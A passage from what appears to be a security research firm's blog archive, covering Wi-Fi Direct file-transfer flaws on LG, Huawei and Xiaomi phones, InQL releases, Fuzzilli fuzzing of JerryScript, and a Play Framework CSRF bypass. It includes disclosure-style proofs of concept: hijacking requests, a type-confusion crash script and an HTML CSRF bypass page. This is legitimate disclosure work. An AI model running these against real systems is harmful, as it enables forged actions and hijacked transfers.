The obvious fact is that it is easier to learn when a colleague is physically in the same office and not on the other side of the screen, but we have learned to deal with this problem. Part of our organizational culture is a “screen sharing session” where two people working on the same project analyze source code and look for vulnerabilities together. During our weekly meetings, we also organize a session called “best bugs” where we all share the most interesting findings from a given week.

3. Remote work = lack of work & life balance?

If a person is not able to organize his/her work day properly, it is easy to drag out the work day from early in the morning to midnight instead of completing everything within the expected eight hours. Self discipline and iterative improvements are the key solutions for an effective day. Work/life balance is important, but who said that forcing a 9am-5pm schedule is the best way to work? Wouldn’t it be better to visit a grocery store or a gym in the middle of the day when no one is around and finish work in the evening?

4. Employees not under control

Healthy remote companies rely on trust. If they didn’t then they wouldn’t offer remote work opportunities in the first place. People working at home carry out their duties like everyone else. In fact, planning activities such as gym-workouts, family time, and hobbies is much easier thanks to the flexible schedule. You can freely organize your work day around important family matters or other responsibilities if necessary.

Companies should be focused on having better hiring processes and ensuring long-term retention instead of being over concerned about the risk of “remote slacking”. In fact, our experience in the past four years would actually suggest that it is more challenging to ensure a healthy work/life balance since our researchers are sufficiently motivated and love what they do.

5. Remote work means working outside the employer’s office

It should be understood that not all remote work is the same. If you work in customer service and receive regular calls from customers, for example, you might be working from a confined space in a separate room at home. Remote work means working outside the employer’s office. It can mean working in a co-working space, cafeteria, hotel or any other place where you have a good Internet connection.

6. Remote work is lonely

This one is a bit tricky since it’s technically true and false. It’s true that you usually sit at home and work alone, but in our security work we’re constantly exchanging information via e-mails, Mattermost, Signal, etc. We also have Hangouts video meetings where we can sync up. If someone feels personally isolated, we always recommend signing up for some activities like a gym, book club or other options where like-minded people associate. Lonely individuals are less productive over the long run. Compared to the traditional office model, remote work requires looking for friends and colleagues outside the company - which isn’t a bad thing after all.

7. Remote work is for everyone

We strongly believe that there are people who will still prefer an onsite job. Some individuals need constant contact with others. They also prefer the standard 9am-5pm work schedule. There is nothing wrong with that. People that are working remotely have to make more decisions on their own and need stronger self-discipline. Since they are unable to engage in direct consultation with co-workers, a reduction of direct communication occurs. Nevertheless, remote work will become something “normal” for an increasing number of people, especially for the Y and Z generation.

Novel Abuses On Wi-Fi Direct Mobile File Transfers

2020-12-10T00:00:00+01:00

The Wi-Fi Direct specification (a.k.a. “peer-to-peer” or “P2P” Wi-Fi) turned 10 years old this past April. This 802.11 extension has been available since Android 4.0 through a dedicated API that interfaces with a devices’ built-in hardware which directly connects to each other via Wi-Fi without an intermediate access point. Multiple mobile vendors and early adopters of this technology quickly leveraged the standard to provide their products with a fast and reliable file transfer solution.

After almost a decade, a huge majority of mobile OEMs still rely on custom locked-in implementations for file transfer, even if large cross-vendors alliances (e.g. the “Peer-to-Peer Transmission Alliance”) and big players like Google (with the recent “Nearby Share” feature) are moving to change this in the near future.

During our research, three popular P2P file transfer implementations were studied (namely Huawei Share, LG SmartShare Beam, Xiaomi Mi Share) and all of them were found to be vulnerable due to an insecure shared design. While some groundbreaking research work attacking the protocol layer has already been presented by Andrés Blanco during Black Hat EU 2018, we decided to focus on the application layer of this particular class of custom UPnP service.

This blog post will cover the following topics:

A Recurrent Design Pattern
LG SmartShare Beam
- What could go wrong?
Huawei Share
- Abusing FTS/FTC Crashes
Xiaomi Mi Share
Conclusions

A Recurrent Design Pattern

On the majority of OEMs solutions, mobile file transfer applications will spawn two servers:

A File Transfer Controller or Client (FTC), that will manage the majority of the pairing and transfer control flow
A File Transfer Server (FTS), that will check a session’s validity and serve the intended shared file

These two services are used for device discovery, pairing and sessions, authorization requests, and file transport functions. Usually they are implemented as classes of a shared parent application which orchestrate the entire transfer. These components are responsible for:

Creating the Wi-Fi Direct network
Using the standard UPnP phases to announce the device, the file service description (/description.xml), and events subscription
Issuing a UPnP remote procedure call to create a transfer request with another peer
Upon acceptance from the recipient, uploading the target file through an HTTP POST/PUT request to a defined location

An important consideration for the following abuses is that after a P2P Wi-Fi connection is established, its network interface (p2p-wlan0-0) is available to every application running on the user’s device having android.permission.INTERNET. Because of this, local apps can interact with the FTS and FTC services spawned by the file sharing applications on the local or remote device clients, opening the door to a multitude of attacks.

LG SmartShare Beam

Smartshare is a stock LG solution to connect their phones to other devices using Wi-Fi (DLNA, Miracast) or Bluetooth (A2DP, OPP). The Beam feature is used for file transfer among LG devices.

Just like other similar applications, an FTS ( FileTransferTransmitter in com.lge.wfds.service.send.tx) and an FTC (FileTransferReceiver in com.lge.wfds.service.send.rx) are spawned and listening on ports 54003 and 55003.

As a way of example, the following HTTP requests demonstrate the FTC and the FTS in action whenever a file transfer session between two parties is requested. First, the FTS performs a CreateSendSession SOAP action:

POST /FileTransfer/control.xml HTTP/1.1
Connection: Keep-Alive
HOST: 192.168.49.1:55003
Content-Type: text/xml; charset="utf-8"
Content-Length: 1025
SOAPACTION: "urn:schemas-wifialliance-org:service:FileTransfer:1#CreateSendSession"
 
<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body>
        <u:CreateSendSession
            xmlns:u="urn:schemas-wifialliance-org:service:FileTransfer:1">
            <Transmitter>Doyensec LG G6 Phone</Transmitter>
            <SessionInformation>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;MetaInfo
                xmlns=&quot;urn:wfa:filetransfer&quot;
                xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;
                xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xsi:schemaLocation=&quot;urn:wfa:filetransfer http://www.wi-fi.org/specifications/wifidirectservices/filetransfer.xsd&quot;&gt;&lt;Note&gt;1 and 4292012bytes File Transfer&lt;/Note&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;NoofItems&gt;1&lt;/NoofItems&gt;&lt;Item&gt;&lt;Name&gt;CuteCat.jpg&lt;/Name&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;Type&gt;image/jpeg&lt;/Type&gt;&lt;/Item&gt;&lt;/MetaInfo&gt;
            </SessionInformation>
        </u:CreateSendSession>
    </s:Body>
</s:Envelope>

The SessionInformation node embeds an entity-escaped standard Wi-Fi Alliance schema, urn:wfa:filetransfer, transmitting a CuteCat.jpg picture. The file name (MetaInfo/Item/Name) is displayed in the file transfer prompt to show to the final recipient the name of the transmitted file. By design, after the recipient’s confirmation, a CreateSendSessionResponse SOAP response will be returned:

HTTP/1.1 200 OK
Date: Sun, 01 Jun 2020 12:00:00 GMT
Connection: Keep-Alive
Content-Type: text/xml; charset="utf-8"
Content-Length: 404
EXT: 
SERVER: UPnPServer/1.0 UPnP/1.0 Mobile/1.0
 
<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body>
        <u:CreateSendSessionResponse
            xmlns:u="urn:schemas-wifialliance-org:service:FileTransfer:1">
            <SendSessionID>33</SendSessionID>
            <TransportInfo>tcp:55432</TransportInfo>
        </u:CreateSendSessionResponse>
    </s:Body>
</s:Envelope>

This will contain the TransportInfo destination port that will be used for the final transfer:

PUT /CuteCat.jpeg HTTP/1.1
User-Agent: LGMobile
Host: 192.168.49.1:55432
Content-Length: 4292012
Connection: Keep-Alive
Content-Type: image/jpeg

.... .Exif..MM ...<redacted>

What could go wrong?

Unfortunately this design suffers many issues, such as:

A valid session ID isn’t required to finalize the transfer
Once a CreateSendSessionResponse is issued, no authentication is required to push a file to the opened RX port. Since the DEFAULT_HTTPSERVER_PORT for the receiver is hardcoded to be 55432, any application running on the sender’s or recipient’s device can hijack the transfer and push an arbitrary file to the victim’s storage, just by issuing a valid PUT request. On top of that, the current Session IDs are easily guessable, since they are randomly chosen from a small pool (WfdsUtil.randInt(1, 100));
File names and type can be arbitrarily changed by the sender
Since the transferred file name is never checked to reflect the one initially prompted to the user, it is possible for an attacker to specify a different file name or type from the one initially shown just by changing the PUT request path to an arbitrary value.
It is possible to send multiple files at once without user confirmation
Once the RX port (DEFAULT_HTTPSERVER_PORT) is opened, it is possible for an attacker to send multiple files in a single transaction, without prompting any notification to the recipient.

Because of the above design issues, any malicious third-party application installed on one of the peers’ devices may influence or take over any communication initiated by the legit LG SmartShare applications, potentially hijacking legit file transfers. A wormable malicious application could abuse this insecure design to flood the local or remote victim waiting for a file transfer, effectively propagating its malicious APK without user interaction required. An attacker could also abuse this design to implant arbitrary files or evidence on a victim’s device.

Huawei Share is another file sharing solution included in Huawei’s EMUI operating system, supporting both Huawei terminals and those of its second brand, Honor.

In Huawei Share, an FTS (FTSService in com.huawei.android.wfdft.fts) and an FTC (FTCService in com.huawei.android.wfdft.ftc) are spawned and listening on ports 8058 and 33003. On a high level, the Share protocol resembles the LG SmartShare Beam mechanism, but without the same design flaws.

Unfortunately, the stumbling block for Huawei Share is the stability of the services: multiple HTTP requests that could respectively crash the FTCService or FTSService were identified. Since the crashes could be triggered by any third-party application installed on the user’s device and because of the UPnP General Event Notification Architecture (GENA) design itself, an attacker can still take over any communication initiated by the legit Huawei Share applications, stealing Session IDs and hijacking file transfers.

Abusing FTS/FTC Crashes

In the replicated attack scenario, Alice and Bob’s devices are connected and paired on a Direct Wi-Fi connection. Bob also unwittingly runs a malicious application with little or no privileges on his device. In this scenario, Bob initiates a file share through Huawei Share 1. His legit application will, therefore, send a CreateSession SOAP action through a POST request to Alice’s FTCService to get a valid SessionID, which will be used as an authorization token for the rest of the transaction. During a standard exchange, after Alice accepts the transfer on her device, a file share event notification (NOTIFY /evetSub) will fire to Bob’s FTSService. The FTSService will then be used to serve the intended file.

NOTIFY /evetSub HTTP/1.1
Content-Type: text/xml; charset="utf-8"
HOST: 192.168.49.1
NT: upnp:event
NTS: upnp:propchange
SID: uuid:e9400170-a170-15bd-802e-165F9431D43F
SEQ: 1
Content-Length: 218
Connection: close
 
<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">
   <e:property>
      <TransportStatus>1924435235:READY_FOR_TRANSPORT</TransportStatus>
   </e:property>
</e:propertyset>

Since an inherent time span exists between the manual acceptance of the transfer by Alice and its start, the malicious application could perform a request with an ad-hoc payload to trigger a crash of FTSService 2 and subsequently bind to the same port its own FTSService 3. Because of the UPnP event subscription and notification protocol design, the NOTIFY event including the SessionID (1924435235 in the example above) can now be intercepted by the fake FTSService 4 and used by the malicious application to serve arbitrary files.

The crashes are undetectable both to the device’s user and to the file recipient. Multiple crash vectors using malformed requests were identified, making the service systemically weak and exploitable.

Introduced with MIUI 11, Xiaomi’s MiShare offers AirDrop-like file transfer features between Mi and Redmi phones. Recently this feature was extended to be compatible with devices produced by the “Peer-to-Peer Transmission Alliance” (including vendors with over 400M users such as Xiaomi, OPPO, Vivo, Realme, Meizu).

Due to this transition, MiShare internally features two different sets of APIs:

One using bare HTTP requests, with many RESTful routes
One using mainly Websockets Secure (WSS) and only a handful of HTTPS requests

The websocket-based API is currently used by default for transfers between Xiaomi Devices and this is the one we assessed. As in other P2P solutions, several minor design and implementation bugs were identified:

The JSON-encoded parcel sent via WSS specifying the file properties is trusted and its fileSize parameter is used to check if there is available space on the device left. Since this is the sender’s declared file size, a Denial of Service (DoS) exhausting the remaining space is possible.
Session tokens (taskId) are 19-digits long and a weak source of entropy (java.util.Random) is used to generate them.
Just like the other presented vendor solutions, any third-party application installed on the user’s device can meddle with MiShare’s exchange. While several DoS payloads crashing MiShare are also available, for this vendor the file transfer service is restarted very quickly, making the window of opportunity for an attack very limited.

On a brighter note, the Mi Share protocol design was hardened using per-session TLS certificates when communicating through WSS and HTTPS, limiting the exploitability of many security issues.

Conclusions

Some of the attacks described can be easily replicated in other existing mobile file transfer solutions. While the core technology has always been there, OEMs still struggle to defend their own P2P sharing flavors. Other common vulnerabilities found in the past include similar improper access control issues, path traversals, XML External Entity (XXE), improper file management, and monkey-in-the-middle (MITM) of the connection.

All vulnerabilities briefly described in this post were responsibly disclosed to the respective OEM security teams between April and June 2020.

InQL Scanner v3 - Just Released!

2020-11-19T00:00:00+01:00

We’re very happy to announce that a new major release of InQL is now available on our Release Page.

If you’re not familiar, InQL is a security testing tool for GraphQL technology. It can be used as a stand-alone script or as a Burp Suite extension.

By combining InQL v3 features with the ability to send query templates to Burp’s Repeater, we’ve made it very easy to exploit vulnerabilities in GraphQL queries and mutations. This drastically lowers the bar for security research against GraphQL tech stacks.

Here’s a short intro for major features that have been implemented in version 3.0:

New IIR (Introspection Intermediate Representation) and Precise Query Generation

InQL now leverages an internal introspection intermediate representation (IIR) to use details obtained from type introspection and generate arbitrarily nested queries with support for any scalar types, enumerations, arrays, and objects. IIR enables seamless “Send to Repeater” functionality from the Scanner to the other tool components (Repeater and GraphQL console).

New Cycles Detector

The new IIR allows us to inspect cycles in defined Graphql schemas by simply using access to graphql introspection-enabled endpoints. In this context, a cycle is a path in the Graphql schema that uses recursive objects in a way that leads to unlimited nesting. The detection of cycles is incredibly useful and automates tedious testing procedures by employing graph solving algorithms. In some of our past client engagements, this tool was able to find millions of cycles in a matter of minutes.

New Request Timer

InQL 3.0.0 has an integrated Query Timer. This Query Timer is a reimagination of Request Timer, which can filter for query name and body. The Query Timer is enabled by default and is especially useful in conjunction with the Cycles detector. A tester can switch between graphql-editor modes (Repeater and GraphIQL) to identify DoS queries. Query Timer demonstrates the ability to attack such vulnerable graphql endpoints by counting each query’s execution time.

Bugs fixes and future development

We’re really thankful to all of you for reporting issues in our previous releases. We have implemented various fixes for functional and UX bugs, including a tricky bug caused by a sudden Burp Suite change in the latest 2020.11 update.

We’re excited to see the community embracing InQL as the “go-to” standard for GraphQL security testing. More features to come, so keep your requests and bug reports coming via our Github’s Issue Page. Your feedback is much appreciated!

This project was made with love in the Doyensec Research Island.

Fuzzing JavaScript Engines with Fuzzilli

2020-09-09T00:00:00+02:00

Background

As part of my research at Doyensec, I spent some time trying to understand current fuzzing techniques, which could be leveraged against the popular JavaScript engines (JSE) with a focus on V8. Note that I did not have any prior experience with fuzzing JSEs before starting this journey.

Dharma

My experimentation started with a context-free grammar (CFG) generator: Dharma. I quickly realized that the grammar rules for generating valid JavaScript code that does something interesting are too complicated. Type confusion and JIT engine bugs were my primary focus, however, most of the generated code was syntactically incorrect. Every statement was wrapped in a try/catch block to deal with the incorrect code. After a few days of fuzzing, I was only able to find out-of-memory (OOM) bugs. If you want to read more about V8 JIT and Dharma, I recommend this thoughtful research.

Dharma allows you to specify three sections for various purposes. The first one is called variable and enables you the definition of variables later used in the value section. The last one, variance is commonly used to specify the starting symbol for expanding the CFG tree.

The linkage is implemented inside the value and a nice feature of Dharma is that here you only define the assignment rules or function invocations, and the variables are automatically created when needed. However, if we assign a variable of type A to one with the different type B, we have to include all the type A rules inside the type B object.

Here is an example of such rule:

try { !TYPEDARRAY! = !ARRAYBUFFER!.slice(!ANY_FUNCTION!, !ANY_FUNCTION!) } catch (e) {};

As you can imagine, without writing an additional library, the code quickly becomes complicated and clumsy.

Fuzzing with coverage is mandatory when targeting popular software as a pure blackbox approach only scratches the attack surface. Coverage could be easily obtained when the binary is compiled with a specific Clang (compiler frontend, part of the LLVM infrastructure) flag. Part of the output could be seen in the picture below. In my case, it was only useful for the manual code review and grammar adjustment, as there was no convenient way how to implement the mutator on the JavaScript source code.

Fuzzilli

As an alternative approach, I started to play with Fuzzilli, which I think is incredible and still a very underrated fuzzer, implemented by Samuel Groß (aka Saelo). Fuzzilli uses an intermediate representation (IR) language called FuzzIL, which is perfectly suitable for mutating. Moreover, any program in FuzzIL could always be converted (lifted) to a valid JavaScript code.

At that time, the supported targets were V8, SpiderMonkey, and JavaScriptCore. As these engines continuously undergo widespread fuzzing, I instead decided to implement support for a different JavaScript Engine. I was also interested in the communication protocol between the fuzzer and the engine, so I considered expanding this fuzzer to be an excellent exercise.

I decided to add support for JerryScript. In the past years, numerous security issues have been discovered on this target by Fuzzinator, which uses the ANTLR v4 testcase generator Grammarinator. Those bugs were investigated and fixed, so I wanted to see if Fuzzilli could find something new.

Fuzzilli Basics

REPRL

The best available high-level documentation about Fuzzilli is Samuel’s Masters Thesis, where it was introduced, and I strongly recommend reading it as this article summarizes some of the novel ideas.

Many modern fuzzer architectures use Forkserver. The idea behind it is to run the program until the initialization is complete, but before it processes any input. Right after that, the input from the fuzzer is read and passed to a newly forked child. The overhead is low since the initialization possibly only occurs once, or when a restart is needed (e.g. in the case of continuous memory leaks).

Fuzzilli uses the REPRL approach, which saves the overhead caused by fork() and the measured execution per sample could be ~7 times faster. The JSE engine is modified to read the input from the fuzzer, and after it executes the sample, it obtains the coverage. The crucial part is to reset the state, which is normally (obviously) not done, as the engine uses the context of the already defined variables. In contrast with the Forkserver, we need a rudimentary knowledge of the engine. It is useful to know how the engine’s string representation is internally implemented to feed the input or add additional commands.

Coverage

LLVM gives a convenient way to obtain the edge coverage. Providing the -fsanitize-coverage=trace-pc-guard compiler flag to Clang, we can receive a pointer to the start and end of the regions, which are initialized by the guard number, as can be read in the llvm documentation:

extern "C" void __sanitizer_cov_trace_pc_guard_init(uint32_t *start,
                                                    uint32_t *stop) {
  static uint64_t N;  // Counter for the guards.
  if (start == stop || *start) return;  // Initialize only once.
  printf("INIT: %p %p\n", start, stop);
  for (uint32_t *x = start; x < stop; x++)
    *x = ++N;  // Guards should start from 1.
}

The guard regions are included in the JSE target. This means that the JavaScript engine must be modified to accommodate these changes. Whenever a branch is executed, the __sanitizer_cov_trace_pc_guard callback is called. Fuzzilli uses a POSIX shared memory object (shmem) to avoid the overhead when passing the data to the parent process. Shmem represents a bitmap, where the visited edge is set and, after each JavaScript input pass, the edge guards are reinitialized.

Generation

We are not going to repeat the program generation algorithms, as they are closely described in the thesis. The surprising fact is that all the programs stem from this simple JavaScript by cleverly applying multiple mutators:

Object()

Integration with JerryScript

To add a new target, several modifications for Fuzzilli should be implemented. From a high level, the REPRL pseudocode is described here.

As we already mentioned, the JavaScript engine must be modified to conform to Fuzzilli’s protocol. To keep the same code standards and logic, we recommend adding a custom command line parameter to the engine. If we decide to run the interpreter without it, it will run normally. Otherwise, it uses the hardcoded descriptor numbers to make the parent knows that the interpreter is ready to process our input.

Fuzzilli internally uses a custom command, by default called fuzzilli, which the interpreter should also implement. The first parameter represents the operator - it could be FUZZILLI_CRASH or FUZZILLI_PRINT. The former is used to check if we can intercept the segmentation faults, while the latter (optional) is used to print the output passed as an argument. By design, the fuzzer prevents execution when some checks fail, e.g., the operation FUZZILLI_CRASH is not implemented.

The code is very similar between different targets, as you can see in the patch for JerryScript that we submitted.

For a basic setup, one needs to write a short profile file stored in Sources/FuzzilliCli/Profiles/. Here we can specify additional builtins specific to the engine, arguments, or thanks to the recent contribution from WilliamParks also the ECMAScriptVersion.

Results

By integrating Fuzzilli with JerryScript, Doyensec was able to identify multiple bugs reported over the course of four weeks through GitHub. All of these issues were fixed.

All issues were also added to the Fuzzilli Bug Showcase:

Fuzzilli is by design efficient against targets with JIT compilers. It can abuse the non-linear execution flow by generating nested callbacks, Prototypes or Proxy objects, where the state of a different object could be modified. Samples produced by Fuzzilli are specifically generated to incorporate these properties, as required for the discovery of type confusion bugs.

This behavior could be easily seen in the Issue #3836. As in most cases, the proof of concept generated by Fuzzilli is very simple:

function main() {
var v3 = new Float64Array(6);
var v4 = v3.buffer;
v4.constructor = Uint8Array;
var v5 = new Float64Array(v3);
}
main();

This could be rewritten without changing the semantics to an even simpler code:

var v1 = new Float64Array(6);
v1.buffer.constructor = Uint8Array;
new Float64Array(v1);

The root cause of this issue is described in the fix.

In JavaScript when a typed array like Float64Array is created, a raw binary data buffer could be accessed via the buffer property, represented by the ArrayBuffer type. However, the type was later altered to typed array view Uint8Array. During the initialization, the engine was expecting an ArrayBuffer instead of the typed array. When calling the ecma_arraybuffer_get_buffer function, the typed array pointer was cast to ArrayBuffer. Note that this is possible since the production build’s asserts are removed. This caused the type confusion bug on line 196.

Consequently, the destination buffer dst_buf_p contained an incorrect pointer, as we can see the memory corruption from the triage via gdb:

Program received signal SIGSEGV, Segmentation fault.
ecma_typedarray_create_object_with_typedarray (typedarray_id=ECMA_FLOAT64_ARRAY, element_size_shift=<optimized out>, proto_p=<optimized out>, typedarray_p=0x5555556bd408 <jerry_global_heap+480>)
    at /home/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:655
655	    memcpy (dst_buf_p, src_buf_p, array_length << element_size_shift);
(gdb) x/i $rip
=> 0x55555557654e <ecma_op_create_typedarray+346>:	rep movsb %ds:(%rsi),%es:(%rdi)
(gdb) i r rdi
rdi            0x3004100020008     844704103137288

Some of the issues, including the one mentioned above, could be probably escalated from Denial of Service to Code Execution. Because of the time constraints and little added value, we have not tried to implement a working exploit.

I want to thank Saelo for including my JerryScript patch into Fuzzilli. And many thanks to Doyensec for the funded 25% research time, which made this project possible.

Additional References

CSRF Protection Bypass in Play Framework

2020-08-20T00:00:00+02:00

This blog post illustrates a vulnerability affecting the Play framework that we discovered during a client engagement. This issue allows a complete Cross-Site Request Forgery (CSRF) protection bypass under specific configurations.

By their own words, the Play Framework is a high velocity web framework for java and scala. It is built on Akka which is a toolkit for building highly concurrent, distributed, and resilient message-driven applications for Java and Scala.

Play is a widely used framework and is deployed on web platforms for both large and small organizations, such as Verizon, Walmart, The Guardian, LinkedIn, Samsung and many others.

Old school anti-CSRF mechanism

In older versions of the framework, CSRF protection were provided by an insecure baseline mechanism - even when CSRF tokens were not present in the HTTP requests.

This mechanism was based on the basic differences between Simple Requests and Preflighted Requests. Let’s explore the details of that.

A Simple Request has a strict ruleset. Whenever these rules are followed, the user agent (e.g. a browser) won’t issue an OPTIONS request even if this is through XMLHttpRequest. All rules and details can be seen in this Mozilla’s Developer Page, although we are primarily interested in the Content-Type ruleset.

The Content-Type header for simple requests can contain one of three values:

application/x-www-form-urlencoded
multipart/form-data
text/plain

If you specify a different Content-Type, such as application/json, then the browser will send a OPTIONS request to verify that the web server allows such a request.

Now that we understand the differences between preflighted and simple requests, we can continue onwards to understand how Play used to protect against CSRF attacks.

In older versions of the framework (until version 2.5, included), a black-list approach on receiving Content-Type headers was used as a CSRF prevention mechanism.

In the 2.8.x migration guide, we can see how users could restore Play’s old default behavior if required by legacy systems or other dependencies:

application.conf

play.filters.csrf {
  header {
    bypassHeaders {
      X-Requested-With = "*"
      Csrf-Token = "nocheck"
    }
    protectHeaders = null
  }
  bypassCorsTrustedOrigins = false
  method {
    whiteList = []
    blackList = ["POST"]
  }
  contentType.blackList = ["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]
}

In the snippet above we can see the core of the old protection. The contentType.blackList setting contains three values, which are identical to the content type of “simple requests”. This has been considered as a valid (although not ideal) protection since the following scenarios are prevented:

attacker.com embeds a <form> element which posts to victim.com
- Form allows form-urlencoded, multipart or plain, which are all blocked by the mechanism
attacker.com uses XHR to POST to victim.com with application/json
- Since application/json is not a “simple request”, an OPTIONS will be sent and (assuming a proper configuration) CORS will block the request
victim.com uses XHR to POST to victim.com with application/json
- This works as it should, since the request is not cross-site but within the same domain

Hence, you now have CSRF protection. Or do you?

Looking for a bypass

Armed with this knowledge, the first thing that comes to mind is that we need to make the browser issue a request that does not trigger a preflight and that does not match any values in the contentType.blackList setting.

The first thing we did was map out requests that we could modify without sending an OPTIONS preflight. This came down to a single request: Content-Type: multipart/form-data

This appeared immediately interesting thanks to the boundary value: Content-Type: multipart/form-data; boundary=something

The description can be found here:

For multipart entities the boundary directive is required, which consists of 1 to 70 characters from a set of characters known to be very robust through email gateways, and not ending with white space. It is used to encapsulate the boundaries of the multiple parts of the message. Often, the header boundary is prepended with two dashes and the final boundary has two dashes appended at the end.

So, we have a field that can actually be modified with plenty of different characters and it is all attacker-controlled.

Now we need to dig deep into the parsing of these headers. In order to do that, we need to take a look at Akka HTTP which is what the Play framework is based on.

Looking at HttpHeaderParser.scala, we can see that these headers are always parsed:

private val alwaysParsedHeaders = Set[String](
    "connection",
    "content-encoding",
    "content-length",
    "content-type",
    "expect",
    "host",
    "sec-websocket-key",
    "sec-websocket-protocol",
    "sec-websocket-version",
    "transfer-encoding",
    "upgrade"
)

And the parsing rules can be seen in HeaderParser.scala which follows RFC 7230 Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing, June 2014.

def `header-field-value`: Rule1[String] = rule {
FWS ~ clearSB() ~ `field-value` ~ FWS ~ EOI ~ push(sb.toString)
}
def `field-value` = {
var fwsStart = cursor rule {
zeroOrMore(`field-value-chunk`).separatedBy { // zeroOrMore because we need to also accept empty values
run { fwsStart = cursor } ~ FWS ~ &(`field-value-char`) ~ run { if (cursor > fwsStart) sb.append(' ') }
} }
}
def `field-value-chunk` = rule { oneOrMore(`field-value-char` ~ appendSB()) } def `field-value-char` = rule { VCHAR | `obs-text` }
def FWS = rule { zeroOrMore(WSP) ~ zeroOrMore(`obs-fold`) } def `obs-fold` = rule { CRLF ~ oneOrMore(WSP) }

If these parsing rules are not obeyed, the value will be set to None. Perfect! That is exactly what we need for bypassing the CSRF protection - a “simple request” that will then be set to None thus bypassing the blacklist.

How do we actually forge a request that is allowed by the browser, but it is considered invalid by the Akka HTTP parsing code?

We decided to let fuzzing answer that, and quickly discovered that the following transformation worked: Content-Type: multipart/form-data; boundary=—some;randomboundaryvalue

An extra semicolon inside the boundary value would do the trick and mark the request as illegal:

POST /count HTTP/1.1
Host: play.local:9000
...
Content-Type: multipart/form-data;boundary=------;---------------------139501139415121
Content-Length: 0

Response

Response:
HTTP/1.1 200 OK
...
Content-Type: text/plain; charset=UTF-8 Content-Length: 1
5

This is also confirmed by looking at the logs of the server in development mode:

a.a.ActorSystemImpl - Illegal header: Illegal 'content-type' header: Invalid input 'EOI', exptected tchar, OWS or ws (line 1, column 74): multipart/form-data;boundary=------;---------------------139501139415121

And by instrumenting the Play framework code to print the value of the Content-Type:

Content-Type: None

Finally, we built the following proof-of-concept and notified our client (along with the Play framework maintainers):

<html>
    <body>
        <h1>Play Framework CSRF bypass</h1>
        <button type="button" onclick="poc()">PWN</button> <p id="demo"></p>
        <script>
        function poc() {
            var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    document.getElementById("demo").innerHTML = this.responseText; 
                } 
            };
            xhttp.open("POST", "http://play.local:9000/count", true);
            xhttp.setRequestHeader(
                "Content-type",
                "multipart/form-data; boundary=------;---------------------139501139415121"
            );
            xhttp.withCredentials = true;
            xhttp.send("");
        }
        </script>
    </body>
</html>

Credits & Disclosure

This vulnerability was discovered by Kevin Joensen and reported to the Play framework via security@playframework.com on April 24, 2020. This issue was fixed on Play 2.8.2 and 2.7.5. CVE-2020-12480 and all details have been published by the vendor on August 10, 2020. Thanks to James Roper of Lightbend for the assistance.

InQL Scanner v2 is out!

2020-06-11T00:00:00+02:00

InQL dyno-mites release

After the public launch of InQL we received an overwhelming response from the community. We’re excited to announce a new major release available on Github. In this version (codenamed dyno-mites), we have introduced a few cool features and a new logo!

Jython Standalone GUI

As you might know, InQL can be used as a stand-alone tool, or as a Burp Suite extension (available for both Professional and Community editions). Using GraphQL built-in introspection query, the tool collects queries, mutations, subscriptions, fields, arguments, etc to automatically generate query templates that can be used for QA / security testing.

In this release, we introduced the ability to have a Jython standalone GUI similar to the Burp’s one:

$ brew install jython
$ jython -m pip install inql
$ jython -m inql

Advanced Query Editor

Many users have asked for syntax highlighting and code completion. Et Voila!

InQL v2 includes an embedded GraphiQL server. This server works as a proxy and handles all the requests, enhancing them with authorization headers. GraphiQL server improves the overall InQL experience by providing an advanced query editor with autocompletion and other useful features. We also introduced stubbing of introspection queries when introspection is not available.

We imagine people working between GraphiQL, InQL and other Burp Suite tools hence we included a custom “Send to GraphiQL” / “Send To Repeater” flow to be able to move queries back and forth between the tools.

Tabbed Editor with Multi-Query and Variables support

But that’s not all. On the Burp Suite extension side, InQL is now handling batched-queries and searching inside queries.

This was possible through re-engineering the editor in use (e.g. the default Burp text editor) and including a new tabbed interface able to sync between multiple representation of these queries.

BApp Store

Finally, InQL is now available on the Burp Suite’s BApp store so that you can easily install the extension from within Burp’s extension tab.

Your browser does not support the video tag.

Stay tuned!

In just three months, InQL has become the go-to utility for GraphQL security testing. We received a lot of positive feedback and decided to double down on the development. We will keep improving the tool based on users’ feedback and the experience we gain through our GraphQL security testing services.

This project was crafted with love in the Doyensec Research Island.

Fuzzing TLS certificates from their ASN.1 grammar

2020-05-14T00:00:00+02:00

A good part of my research time at Doyensec was devoted to building a flexible ASN.1 grammar-based fuzzer for testing TLS certificate parsers. I learned a lot in the process, but I often struggled to find good resources on these topics. In this blogpost I want to give a high-level overview of the problem, the approach I’m taking, and some pointers which might hopefully save a little time for other fellow security researchers.

Let’s start with some basics.

What is a TLS certificate?

A TLS certificate is a DER-encoded object conforming to the ASN.1 grammar and constraints defined in RFC 5280, which is based on the ITU X.509 standard.

That’s a lot of information to unpack, let’s take it one piece at a time.

ASN.1

ASN.1 (Abstract Syntax Notation One) is a grammar used to define abstract objects. You can think of it as a much older and more complicated version of Protocol Buffers. ASN.1 however does not define an encoding, which is left to other standards. This language was designed by ITU and it is extremely powerful and general purpose.

This is how a message in a chat protocol might be defined:

Message ::= SEQUENCE {
    senderId     INTEGER,
    recipientId  INTEGER,
    message      UTF8String,
    sendTime     GeneralizedTime,
    ...
}

At this first sight, ASN.1 might even seem quite simple and intuitive. But don’t be fooled! ASN.1 contains a lot of vestigial and complex features. For a start, it has ~13 string types. Constraints can be placed on fields, for instance, integers and the string sizes can be restricted to an acceptable range.

The real complexity beasts however are information objects, parametrization and tabular constraints. Information objects allows the definition of templates for data types and a grammar to declare instances of that template (oh yeah…defining a grammar within a grammar!).

